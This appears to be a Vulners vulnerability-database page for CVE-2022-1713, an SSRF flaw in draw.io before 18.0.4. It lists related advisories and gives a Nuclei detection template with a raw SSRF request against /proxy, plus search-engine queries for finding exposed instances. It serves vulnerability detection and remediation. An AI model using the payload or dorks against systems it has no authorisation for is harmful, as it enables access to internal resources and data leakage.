| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
| CVE-2022-1713 | 16 May 202215:15 | – | attackerkb | |
| SSRF on /proxy | 13 May 202201:30 | – | huntr | |
| CVE-2022-1713 | 16 May 202218:26 | – | circl | |
| JGraph draw.io 代码问题漏洞 | 16 May 202200:00 | – | cnnvd | |
| CVE-2022-1713 | 16 May 202214:31 | – | cve | |
| CVE-2022-1713 SSRF on /proxy in jgraph/drawio | 16 May 202214:31 | – | cvelist | |
| CVE-2022-1713 | 16 May 202215:15 | – | nvd | |
| CVE-2022-1713 SSRF on /proxy in jgraph/drawio | 16 May 202214:31 | – | osv | |
| Server side request forgery (ssrf) | 16 May 202215:15 | – | prion | |
| PT-2022-14065 · Jgraph · Jgraph/Drawio | 16 May 202200:00 | – | ptsecurity |
id: CVE-2022-1713
info:
name: Drawio <18.0.4 - Server-Side Request Forgery
author: pikpikcu
severity: high
description: |
Drawio prior to 18.0.4 is vulnerable to server-side request forgery. An attacker can make a request as the server and read its contents. This can lead to a leak of sensitive information.
impact: |
Successful exploitation of this vulnerability could result in unauthorized access to sensitive internal resources and potential data leakage.
remediation: |
Upgrade Drawio to version 18.0.4 or later to mitigate the SSRF vulnerability.
reference:
- https://huntr.dev/bounties/cad3902f-3afb-4ed2-abd0-9f96a248de11
- https://github.com/jgraph/drawio/commit/283d41ec80ad410d68634245cf56114bc19331ee
- https://nvd.nist.gov/vuln/detail/CVE-2022-1713
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-1713
cwe-id: CWE-918
epss-score: 0.08667
epss-percentile: 0.94467
cpe: cpe:2.3:a:diagrams:drawio:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: diagrams
product: drawio
shodan-query:
- http.title:"Flowchart Maker"
- http.title:"flowchart maker"
fofa-query: title="flowchart maker"
google-query: intitle:"flowchart maker"
tags: cve,cve2022,drawio,ssrf,oss,huntr,diagrams,vuln
http:
- raw:
- |
GET /proxy?url=http%3a//0:8080/ HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>Flowchart Maker & Online Diagram Software</title>"
- type: word
part: header
words:
- "application/octet-stream"
# digest: 4a0a00473045022077551d654e97044c73948f341d59f7527d19b5a884356f22df3164cbfc9743f1022100d55cddce1582bb444d3065e59f6e9f1697b5dda30b72065af91f3e41a0047bf9:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation